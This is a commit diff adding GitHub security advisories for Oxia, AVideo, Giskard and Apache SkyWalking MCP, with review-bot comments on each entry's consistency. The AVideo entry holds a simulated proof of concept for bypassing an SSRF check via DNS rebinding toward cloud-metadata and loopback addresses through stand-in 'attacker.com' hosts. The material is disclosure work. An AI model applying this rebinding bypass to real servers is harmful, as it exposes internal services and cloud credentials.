
Commit d6350ac

1 parent 5be5f54 commit d6350ac

7 files changed

Lines changed: 383 additions & 4 deletions


Lines changed: 58 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,58 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-5gqc-qhrj-9xw8",
4+
"modified": "2026-04-14T23:15:00Z",
5+
"published": "2026-04-14T23:15:00Z",
6+
"aliases": [],
7+
"summary": "Oxia affected by server crash via race condition in session heartbeat handling",
8+
"details": "### Summary\nA race condition between session heartbeat processing and session closure can cause the server to panic with `send on closed channel`. The `heartbeat()` method uses a blocking channel send while holding a mutex, and under specific timing with concurrent `close()` calls, this can lead to either a deadlock (channel buffer full) or a panic (send on closed channel after TOCTOU gap in `KeepAlive`).\n\n### Impact\nA remote client can trigger a server crash by sending rapid `KeepAlive` requests while a session is expiring or being closed. This is a denial-of-service vulnerability that crashes the entire data server process.\n\nAll versions are affected.\n\n### Details\nIn `oxiad/dataserver/controller/lead/session.go`, the `heartbeat()` method performs a blocking `s.heartbeatCh <- true` send. If the channel buffer is full (size 1), this blocks while holding the session mutex, preventing `close()` from acquiring the lock to close the channel — a deadlock.\n\nAdditionally, in `session_manager.go`, `KeepAlive()` releases the session manager's read lock before calling `heartbeat()`, creating a TOCTOU window where the session can be removed and closed between the lookup and the heartbeat call.\n\n### Patches\nFixed by changing `heartbeat()` to use a non-blocking `select` with a `default` case, and by holding the session manager read lock through the entire `KeepAlive()` operation.\n\n### Workarounds\nNo workaround available.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "Go",
19+
"name": "github.com/oxia-db/oxia"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"fixed": "0.16.2"
30+
}
31+
]
32+
}
33+
],
34+
"database_specific": {
35+
"last_known_affected_version_range": "<= 0.16.1"
36+
}
37+
}
38+
],
39+
"references": [
40+
{
41+
"type": "WEB",
42+
"url": "https://github.com/oxia-db/oxia/security/advisories/GHSA-5gqc-qhrj-9xw8"
43+
},
44+
{
45+
"type": "PACKAGE",
46+
"url": "https://github.com/oxia-db/oxia"
47+
}
48+
],
49+
"database_specific": {
50+
"cwe_ids": [
51+
"CWE-362"
52+
],
53+
"severity": "HIGH",
54+
"github_reviewed": true,
55+
"github_reviewed_at": "2026-04-14T23:15:00Z",
56+
"nvd_published_at": null
57+
}
58+
}
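Review bot: the Patches sentence should say why dropping a heartbeat in the new non-blocking `select`/`default` path is safe: the channel buffer is size 1 (per Details), so a full buffer already holds an undelivered heartbeat and the dropped send carries no new information; without that sentence a reader may think the fix silently loses keep-alives. Separately, `aliases` is `[]` and `nvd_published_at` is `null`, so nothing ties this entry to a CVE yet; if one is assigned, add it to `aliases` and an `ADVISORY` reference rather than only bumping `modified`.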
Lines changed: 63 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,63 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-793q-xgj6-7frp",
4+
"modified": "2026-04-14T23:15:43Z",
5+
"published": "2026-04-14T23:15:43Z",
6+
"aliases": [],
7+
"summary": "WWBN AVideo has an incomplete fix for CVE-2026-33039: SSRF",
8+
"details": "### Summary\n\nThe incomplete SSRF fix in AVideo's LiveLinks proxy adds `isSSRFSafeURL()` validation but leaves DNS TOCTOU vulnerabilities where DNS rebinding between validation and the actual HTTP request redirects traffic to internal endpoints.\n\n### Affected Package\n\n- **Ecosystem:** Other\n- **Package:** AVideo\n- **Affected versions:** < commit 0e56382921fc71e64829cd1ec35f04e338c70917\n- **Patched versions:** >= commit 0e56382921fc71e64829cd1ec35f04e338c70917\n\n### Details\n\nThe `plugin/LiveLinks/proxy.php` endpoint proxies live stream URLs. The fix adds `isSSRFSafeURL()` check on the initial URL, redirect URL validation, and `follow_location=0` in the `get_headers()` context. However, multiple DNS TOCTOU vulnerabilities remain.\n\nFor the initial URL, `isSSRFSafeURL()` resolves DNS once for validation, but `get_headers()` resolves DNS again independently. A DNS rebinding attack with TTL=0 returns a safe external IP for the first resolution and an internal IP for the second.\n\nThe same TOCTOU exists for redirect URLs: `isSSRFSafeURL()` validates the redirect target (first resolution returns a safe IP), then `fakeBrowser()` makes the actual request (second resolution returns an internal IP).\n\nAdditionally, even with `follow_location=0`, `get_headers()` still sends an HTTP request that can probe internal services via DNS rebinding, and multiple `Location` headers in a response cause `filter_var()` to receive an array instead of a string, resulting in a fall-through to the else branch.\n\n### PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nCVE-2026-33039 - AVideo LiveLinks Proxy SSRF via DNS Rebinding\n\"\"\"\n\nimport re\nimport sys\n\nclass DNSResolver:\n def __init__(self):\n self._call_count = {}\n\n def resolve(self, host):\n if host not in self._call_count:\n self._call_count[host] = 0\n self._call_count[host] += 1\n\n if host == \"rebind.attacker.com\":\n return \"93.184.216.34\" if self._call_count[host] == 1 else 
\"169.254.169.254\"\n if host == \"rebind-loopback.attacker.com\":\n return \"93.184.216.34\" if self._call_count[host] == 1 else \"127.0.0.1\"\n\n static = {\"attacker.com\": \"93.184.216.34\", \"example.com\": \"93.184.216.34\", \"localhost\": \"127.0.0.1\"}\n return static.get(host, None)\n\n def reset(self):\n self._call_count = {}\n\ndns = DNSResolver()\n\ndef php_parse_url_host(url):\n match = re.match(r'https?://([^/:?#]+)', url, re.IGNORECASE)\n return match.group(1).lower() if match else None\n\ndef php_filter_validate_ip(s):\n if re.match(r'^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$', s):\n return all(0 <= int(p) <= 255 for p in s.split('.'))\n return False\n\ndef is_ssrf_safe_url(url):\n if not url: return False, \"empty\"\n host = php_parse_url_host(url)\n if not host: return False, \"no host\"\n\n for pat in ['localhost', '127.0.0.1', '::1', '0.0.0.0']:\n if host == pat: return False, f\"blocked: {host}\"\n\n ip = host\n if not php_filter_validate_ip(host):\n resolved = dns.resolve(host)\n if not resolved: return False, \"DNS failed\"\n ip = resolved\n\n for pattern in [r'^10\\.', r'^172\\.(1[6-9]|2\\d|3[0-1])\\.', r'^192\\.168\\.', r'^127\\.', r'^169\\.254\\.']:\n if re.match(pattern, ip): return False, f\"blocked: {ip}\"\n\n return True, f\"allowed ({ip})\"\n\ndef main():\n print(\"=\" * 72)\n print(\"CVE-2026-33039 - AVideo LiveLinks Proxy SSRF PoC\")\n print(\"=\" * 72)\n\n vuln_count = 0\n\n print(\"\\n[TEST 1] DNS rebinding on initial URL\")\n dns.reset()\n safe, reason = is_ssrf_safe_url(\"http://rebind.attacker.com/meta-data/\")\n actual_ip = dns.resolve(\"rebind.attacker.com\")\n print(f\" isSSRFSafeURL: safe={safe}, reason={reason}\")\n print(f\" Actual request goes to: {actual_ip}\")\n if safe and actual_ip == \"169.254.169.254\":\n print(\" => BYPASS!\")\n vuln_count += 1\n\n print(\"\\n[TEST 2] DNS rebinding on redirect URL\")\n dns.reset()\n safe_r, _ = is_ssrf_safe_url(\"http://rebind-loopback.attacker.com/admin/\")\n final_ip = 
dns.resolve(\"rebind-loopback.attacker.com\")\n print(f\" isSSRFSafeURL: safe={safe_r}\")\n print(f\" fakeBrowser() goes to: {final_ip}\")\n if safe_r and final_ip == \"127.0.0.1\":\n print(\" => BYPASS!\")\n vuln_count += 1\n\n print(\"\\n[TEST 3] get_headers() side-effect\")\n dns.reset()\n safe, _ = is_ssrf_safe_url(\"http://rebind.attacker.com:8080/probe\")\n side_ip = dns.resolve(\"rebind.attacker.com\")\n print(f\" isSSRFSafeURL passed: {safe}\")\n print(f\" get_headers() reached: {side_ip}\")\n if safe and side_ip == \"169.254.169.254\":\n print(\" => BYPASS!\")\n vuln_count += 1\n\n print(f\"\\nBypass vectors: {vuln_count}\")\n if vuln_count > 0:\n print(\"\\nVULNERABILITY CONFIRMED\")\n return 0\n return 1\n\nif __name__ == \"__main__\":\n sys.exit(main())\n```\n\n**Steps to reproduce:**\n1. Run `python3 poc.py`.\n2. Observe that all three DNS rebinding bypass vectors succeed.\n\n**Expected output:**\n```\nVULNERABILITY CONFIRMED\nDNS TOCTOU bypass vectors succeed on initial URL, redirect URL, and get_headers() side-effect paths.\n```\n\n### Impact\n\nDNS rebinding allows an attacker to bypass SSRF validation and make the server send requests to internal services, cloud metadata endpoints, and other protected resources.\n\n### Suggested Remediation\n\nPin DNS resolution: resolve the hostname once, validate the IP, and use the resolved IP for the actual request via `CURLOPT_RESOLVE` or equivalent. Remove the `get_headers()` call. Block redirects entirely or re-validate using pinned DNS after each redirect.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "Packagist",
19+
"name": "wwbn/avideo"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"last_affected": "29.0"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-793q-xgj6-7frp"
40+
},
41+
{
42+
"type": "ADVISORY",
43+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33039"
44+
},
45+
{
46+
"type": "WEB",
47+
"url": "https://github.com/WWBN/AVideo/commit/0e56382921fc71e64829cd1ec35f04e338c70917"
48+
},
49+
{
50+
"type": "PACKAGE",
51+
"url": "https://github.com/WWBN/AVideo"
52+
}
53+
],
54+
"database_specific": {
55+
"cwe_ids": [
56+
"CWE-918"
57+
],
58+
"severity": "MODERATE",
59+
"github_reviewed": true,
60+
"github_reviewed_at": "2026-04-14T23:15:43Z",
61+
"nvd_published_at": null
62+
}
63+
}
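Review bot: the `affected` range and the Details text disagree on patch status. Details declares `Patched versions: >= commit 0e56382921fc71e64829cd1ec35f04e338c70917`, but the range ends with `"last_affected": "29.0"` and has no `fixed` event, so consumers will treat every Packagist version of `wwbn/avideo` as vulnerable; either add a `fixed` event once the commit ships in a tagged release or state in Details that no released version contains the fix. Two smaller inconsistencies: Details lists `Ecosystem: Other` while the package block uses `Packagist`, and the `Expected output` fence quotes a second line (`DNS TOCTOU bypass vectors succeed on initial URL, redirect URL, and get_headers() side-effect paths.`) that the embedded script never prints (it prints `Bypass vectors: N` and `VULNERABILITY CONFIRMED`).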
Lines changed: 58 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,58 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-7jrq-q4pq-rhm6",
4+
"modified": "2026-04-14T23:15:16Z",
5+
"published": "2026-04-14T23:15:16Z",
6+
"aliases": [],
7+
"summary": "Oxia's TLS CA certificate chain validation fails with multi-certificate PEM bundles",
8+
"details": "### Summary\nThe `trustedCertPool()` function in the TLS configuration only parses the first PEM block from CA certificate files. When a CA bundle contains multiple certificates (e.g., intermediate + root CA), only the first certificate is loaded. This silently breaks certificate chain validation for mTLS.\n\n### Impact\nIn deployments using mTLS with certificate chains (intermediate CA + root CA bundles), legitimate clients with properly chained certificates are rejected with `x509: certificate signed by unknown authority`. This degrades the security posture by making mTLS unusable with standard CA chain configurations, potentially forcing operators to disable client certificate verification.\n\nAll versions using TLS with `trustedCaFile` configuration are affected.\n\n### Details\nIn `common/security/tls.go`, the `trustedCertPool()` method calls `pem.Decode()` only once, processing a single PEM block. The remaining bytes (containing additional certificates) are silently discarded. Additionally, the error return from `pem.Decode` is ignored, so a corrupted CA file results in an empty certificate pool without any error.\n\n### Patches\nFixed by iterating over all PEM blocks in the file, parsing each CERTIFICATE block, and returning an error if no valid certificates are found.\n\n### Workarounds\nUse CA files containing only a single certificate (the direct issuer of client certificates, not a chain).",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "Go",
19+
"name": "github.com/oxia-db/oxia"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"fixed": "0.16.2"
30+
}
31+
]
32+
}
33+
],
34+
"database_specific": {
35+
"last_known_affected_version_range": "<= 0.16.1"
36+
}
37+
}
38+
],
39+
"references": [
40+
{
41+
"type": "WEB",
42+
"url": "https://github.com/oxia-db/oxia/security/advisories/GHSA-7jrq-q4pq-rhm6"
43+
},
44+
{
45+
"type": "PACKAGE",
46+
"url": "https://github.com/oxia-db/oxia"
47+
}
48+
],
49+
"database_specific": {
50+
"cwe_ids": [
51+
"CWE-295"
52+
],
53+
"severity": "HIGH",
54+
"github_reviewed": true,
55+
"github_reviewed_at": "2026-04-14T23:15:16Z",
56+
"nvd_published_at": null
57+
}
58+
}
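Review bot: the Details paragraph claims "the error return from `pem.Decode` is ignored", but Go's `pem.Decode` has the signature `func Decode(data []byte) (p *Block, rest []byte)` and returns no error; the real failure mode is a `nil` block for non-PEM input, which the described code presumably passes through as an empty pool. Reword to "a nil block from `pem.Decode` is not treated as an error". Also, the CVSS v4 vector scores `VC:H/VI:H`, while the direct effect described is rejection of legitimate clients (`certificate signed by unknown authority`); the confidentiality/integrity impact only materializes if an operator reacts by disabling client-certificate verification, so Details should state that as the scoring assumption.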
Lines changed: 60 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,60 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-7xjm-g8f4-rp26",
4+
"modified": "2026-04-14T23:13:52Z",
5+
"published": "2026-04-14T23:13:52Z",
6+
"aliases": [
7+
"CVE-2026-40320"
8+
],
9+
"summary": "Giskard has Unsandboxed Jinja2 Template Rendering in ConformityCheck",
10+
"details": "## Summary\n \nThe `ConformityCheck` class in `giskard-checks` rendered the `rule` parameter through Jinja2's default `Template()` constructor. Because the `rule` string is silently interpreted as a Jinja2 template, a developer may not realize that template expressions embedded in rule definitions are evaluated at runtime. In a scenario where check definitions are loaded from an untrusted source (e.g. a shared project file or externally contributed configuration), this could lead to arbitrary code execution.\n\n`giskard-checks` is a local developer testing library with no network-facing service. Check definitions, including the `rule` parameter, are provided in application code or project configuration files and executed locally. Exploitation requires write access to a check definition and subsequent execution of the test suite by a developer.\n\nHowever, the implicit template evaluation of the `rule` parameter is not obvious from the API surface. This hidden behavior increases the likelihood of a developer inadvertently passing untrusted input to it when integrating the library into a larger system. \n\n## Affected Component\n \n`conformity.py`, line 59:\n```python\nfrom jinja2 import Template\n...\nformatted_rule = Template(self.rule).render(trace=trace)\n```\n \n## Affected Versions\n \n`giskard-checks` < 1.0.2b1\n \n## Patched Version\n \n`giskard-checks` >= **1.0.2b1** (template parsing removed from rule evaluation entirely)\n \n## Remediation\n \nUpgrade to `giskard-checks` >= 1.0.2b1. The template rendering has been removed from rule evaluation.\n \n## Credit\n \nGiskard-AI thanks @dhabaleshwar for identifying the unsandboxed template usage.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "giskard-checks"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.0.2b1"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 1.0.1b1"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/Giskard-AI/giskard-oss/security/advisories/GHSA-7xjm-g8f4-rp26"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/Giskard-AI/giskard-oss"
49+
}
50+
],
51+
"database_specific": {
52+
"cwe_ids": [
53+
"CWE-1336"
54+
],
55+
"severity": "MODERATE",
56+
"github_reviewed": true,
57+
"github_reviewed_at": "2026-04-14T23:13:52Z",
58+
"nvd_published_at": null
59+
}
60+
}
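Review bot: the `details` string contains whitespace-only lines (`\n \n`) around each `##` heading that render as stray trailing spaces; strip them. `aliases` carries `CVE-2026-40320`, yet `references` has no `ADVISORY` entry for the NVD record and `nvd_published_at` is `null`; add the NVD link once the record appears, as the SkyWalking entry in this commit does. The quoted snippet (`Template(self.rule).render(trace=trace)`) is sufficient to support the `CWE-1336` classification, and the Remediation note that templating was removed entirely (rather than sandboxed) is the stronger fix and worth keeping explicit.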

advisories/unreviewed/2026/04/GHSA-c4hg-6933-x62x/GHSA-c4hg-6933-x62x.json renamed to advisories/github-reviewed/2026/04/GHSA-c4hg-6933-x62x/GHSA-c4hg-6933-x62x.json

Lines changed: 29 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1,24 +1,49 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-c4hg-6933-x62x",
4-
"modified": "2026-04-13T18:30:40Z",
4+
"modified": "2026-04-14T23:16:30Z",
55
"published": "2026-04-13T15:31:41Z",
66
"aliases": [
77
"CVE-2026-34476"
88
],
9+
"summary": "Apache SkyWalking MCP: Server-Side Request Forgery via SW-URL Header in MCP Server",
910
"details": "Server-Side Request Forgery via SW-URL Header vulnerability in Apache SkyWalking MCP.\n\nThis issue affects Apache SkyWalking MCP: 0.1.0.\n\nUsers are recommended to upgrade to version 0.2.0, which fixes this issue.",
1011
"severity": [
1112
{
1213
"type": "CVSS_V3",
1314
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"
1415
}
1516
],
16-
"affected": [],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/apache/skywalking-mcp"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "0.2.0"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
1738
"references": [
1839
{
1940
"type": "ADVISORY",
2041
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34476"
2142
},
43+
{
44+
"type": "PACKAGE",
45+
"url": "https://github.com/apache/skywalking-mcp"
46+
},
2247
{
2348
"type": "WEB",
2449
"url": "https://lists.apache.org/thread/v0k1xyzzbtnpyrwxwyn36pbspr8rhjnr"
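Review bot: the new `affected` entry uses `"introduced": "0"` with `"fixed": "0.2.0"`, while Details says only `0.1.0` is affected; that is the standard OSV encoding, but since `modified` is bumped here anyway, consider adding `database_specific.last_known_affected_version_range` of `<= 0.1.0` as the other reviewed entries in this commit do, so tooling that reads that field gives the same answer. The added `PACKAGE` reference is the right companion to the Go package name `github.com/apache/skywalking-mcp`.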
@@ -33,8 +58,8 @@
3358
"CWE-918"
3459
],
3560
"severity": "HIGH",
36-
"github_reviewed": false,
37-
"github_reviewed_at": null,
61+
"github_reviewed": true,
62+
"github_reviewed_at": "2026-04-14T23:16:30Z",
3863
"nvd_published_at": "2026-04-13T13:16:40Z"
3964
}
4065
}
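Review bot: `github_reviewed_at` (`2026-04-14T23:16:30Z`) matches the `modified` timestamp set in the first hunk, which is the expected pairing when an entry is promoted from `unreviewed` to `github-reviewed` (the rename in the file header); nothing else to flag in this hunk.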
